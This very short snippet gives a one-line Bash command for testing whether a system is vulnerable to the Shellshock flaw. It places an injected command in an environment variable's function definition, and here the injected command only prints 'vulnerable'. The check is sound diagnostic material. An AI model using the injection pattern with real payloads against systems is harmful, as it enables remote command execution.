To check if the system is vulnerable:
 
env x='() { :;}; echo vulnerable' bash -c /bin/bash
 
returns 'vulnerable'